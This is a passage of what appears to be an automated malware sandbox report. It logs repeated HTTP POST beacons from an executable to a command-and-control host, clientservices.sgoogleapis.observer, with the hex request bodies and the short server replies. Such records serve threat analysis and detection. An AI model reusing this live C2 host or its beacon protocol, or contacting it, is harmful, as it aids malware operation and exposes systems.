cfL4;desc="?proto=TCP&rtt=1981&min_rtt=1981&rtt_var=990&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49749	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:44:20.636873007 CET	326	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Jan 8, 2025 08:44:21.200469017 CET	825	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:44:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iimtd6qGPUlxSGyHouimUdT03q3MVp%2FHSEkbp2e44WKy2j04%2BYbL8sx1M1qFHTUqYfFrkbg4Lu52HGruVDUM2qyGgu3aK%2FQSdfdzVY3DPRs2%2BmuuWjfwFhe98Ch8qHoMsUyA33qhqr%2FeEL9uWMGWcm9fJAQ6Ow%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea8fd39ebcc443-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1622&min_rtt=1622&rtt_var=811&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49765	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:44:22.826100111 CET	172	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jan 8, 2025 08:44:23.472223997 CET	819	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:44:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RMqU74Gdsx5mGfKjzElSuVf%2Bu4ETCv363OqnahcAorq90tHTLO6JSjYkBTDOXF9GKBBn95MS%2BxPxyGNUAVn%2B0dqiRQMItnDeboDV7%2BCO%2BSm1tO3BiOyRSkU0dHXwQU9xaa9audMfjLxn8W0iy4rSFJ9Lj7SOzw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea8fe13c5043ee-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1718&min_rtt=1718&rtt_var=859&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49776	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:44:24.981040001 CET	326	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Jan 8, 2025 08:44:25.612215996 CET	825	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:44:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YALzIHvDuLYBJrgQ6Dd3Zvfh2FGegCufxFpWuVdo%2BzMykbzthBgtVcBX0Htun%2BJz82an4iZ5kKlfj9nt9vVRf1%2F53ta%2BigrwJMxUQnvcusIBmT7SsXiiUzmGSXDb3Hn4uf%2B95v4UO3wZdYjKJx9mMF2PTjFBiQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea8feeaf6f8c0f-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1941&min_rtt=1941&rtt_var=970&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49792	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:44:27.247229099 CET	172	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jan 8, 2025 08:44:27.885174990 CET	821	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:44:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OzGmBLudw26ubDfc7Pcyj88f96N%2BcUXmo2bNkMArHqFT9W5LjRnyYe0Q1MGobO2jvh5k00RapfprQwUnGbXnaMsBseuLV0zIQ%2BaeJ2ICwoeBdIRYOvAT%2BsMcp20wAg3nNyL1ULAVgdiL6yVQ%2FhzbwHLa%2BXi%2BVA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea8ffcdad97d0e-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1972&min_rtt=1972&rtt_var=986&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49807	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:44:29.402479887 CET	326	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Jan 8, 2025 08:44:29.978251934 CET	815	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:44:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DdmFWg4p3oTY0fE7RhW4f0erdp0AxxtxWRqbT8n8EJUwTb8gngw98thghvfoQs2UeTyPTaan8iZJLL3dBOa9QyEjUvW1JQvrYF7IMD1dXDX40wv2yTE1nNBuyDb1U6uJuAClWQ0Q1sImukCESF5881kDAkxQoQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea900a6eb4c443-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1563&min_rtt=1563&rtt_var=781&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49823	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:44:31.605812073 CET	172	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jan 8, 2025 08:44:32.261640072 CET	813	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:44:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Lze0guj4PNNJ9uz3WZXxit8b6MY%2F046YlbC3f2c52i%2BTIvFJ0SFZtDNsqk872ceQ8dYLpW4sXUT8ZvImNtFy9RUvMzGI26zWS8OMC1nryGZEA2l9H4kNMnEbZ7ti7xCPmNrNDAaQVZBcUBGsMyrPcvZSZGOgdw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea90182e6a7d0e-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1931&min_rtt=1931&rtt_var=965&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49839	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:44:33.777914047 CET	326	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Jan 8, 2025 08:44:34.421993017 CET	825	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:44:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kGv9kLGGiebTym32eIrtcZOxtM%2Fc0B5bjgtSQNl8uOcyB9VrLEpfh%2Bf8r1oc%2FNUXRokg%2BmLuzbOHsJiIraYOmOqa9e1%2BOXe9dCYntlEAF2eDsni1l9NjSl87OjAFScUEoYbrSbqzomBdgKsVQHAMAtlywu6gjw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea9025aa5d42d2-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1644&min_rtt=1644&rtt_var=822&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49855	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:44:36.061043024 CET	172	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jan 8, 2025 08:44:36.707886934 CET	817	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:44:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bxGn168AKb%2FWVrB1W5qEi74Cco2pRLSSmGaUJK5M0N2aF%2BjjT5j2x8Oi5eHvip4WXiulyRHU9Q7N%2BRwRjbPMajH4BNgt0blUeQOB8%2F68kyxJddyghOQVzADnrVqujdMi4Aaz286kX9ZijHHubSu5IZv9BzCrQQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea9033fa0b8c0f-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1932&min_rtt=1932&rtt_var=966&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49871	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:44:38.214849949 CET	326	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Jan 8, 2025 08:44:38.879929066 CET	830	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:44:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dt7A8oWyqx6BtAXp45hlkw9BEYF9LfRnX9fyy0YT%2BboHJ6e%2BZICoqe%2FTqKCGLdMGJFqM1VAJ0EDZexTlfkGdFCATtTxQ%2BLsfBuTlZxD%2BhX6q860%2BEUGUpDGOan20J4nCLxRsPSBEmLtRAnCNyC2tk24Yd0%2B72g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea90417ca48c0f-EWR server-timing: cfL4;desc="?proto=TCP&rtt=2312&min_rtt=2312&rtt_var=1156&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	49886	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:44:40.511753082 CET	172	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jan 8, 2025 08:44:41.142518044 CET	817	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:44:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ky1ANEeNbyYQp2jv1Dc9xzbOLP2ha28ZbdmxYL8L%2F9vhRE0aLJl5JWHpElxvBBtHvcOlKJThnJwOWqcubVqs55dzEG3FUqkRP3I8xpNEs%2FLoXwY81zjg3lVlwAUdaqGPZcPWd7XqlaZhMPmo%2FfTbVrGuK%2BjD3g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea904fbd508c0f-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1958&min_rtt=1958&rtt_var=979&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	49896	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:44:42.871694088 CET	326	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Jan 8, 2025 08:44:43.501418114 CET	823	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:44:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W8hMZ0vUDqyxHdsLgtVKa2Owwno562%2BpYbQefFd%2BdP15ScpLtOkQQzkNHPBh%2FuK4RVuqFklZw5r08e5rdJvMCr2QQBHamr7OTBeDh6ObVoQc%2F7FwwHYylACwlXLLkrzavGPWQQfIsumpcw2fGLUD6V4C6RYp1Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea905e6c620f36-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1435&min_rtt=1435&rtt_var=717&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	49914	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:44:45.138725042 CET	172	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jan 8, 2025 08:44:45.766542912 CET	821	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:44:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jjPNanYsvRIIF9qNTtJf0uJPw48r5s%2F9pPB%2BADZZTEchJr9fkI6Dyoh5BReECTRAd9jG9rCW%2BsXxycDwJeJyA9EU%2BjFSZe9UrJWDY75z%2FEZox%2FNWRTAJDO0iPV46SCFZdeRxRl4853NfYwg5PZiWwJcKV6TqHg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea906c9f5f7d0e-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1920&min_rtt=1920&rtt_var=960&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	49926	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:44:47.484566927 CET	326	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Jan 8, 2025 08:44:48.129406929 CET	825	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:44:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vUTwa5zyEh3Ek%2FuNlX25TgSGqz1LQGGm82akWNyAyyCzaUw640T4XYSE%2B%2FnLeLBgsiM0KbmHnibCcvDE0i4YqO4I3i9Ou9auIlKOechxN5JTaNOUJSNrKlmAcWW5AxVN8E%2BAQJ7dzhMnVHqqW%2FlY246zYK3Zfw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea907b5c817d0e-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1987&min_rtt=1987&rtt_var=993&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	49942	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:44:49.761737108 CET	172	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jan 8, 2025 08:44:50.406974077 CET	815	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:44:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CMrsClHIQD3M%2BimDasGY7pjpUe8dd5WvbINQ4Qih%2Fz5GSNMtkgD6RZ1WgNayymymkQnQ5Ubd7D2lZ8gtAmCAAmfCYzvFAePdhFs3DafJmnGPAcG0CH2V8h1c7lLZas%2FbCpAapwkdo83wSJXglIORsvvYV8M1jA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea9089983bc443-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1537&min_rtt=1537&rtt_var=768&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

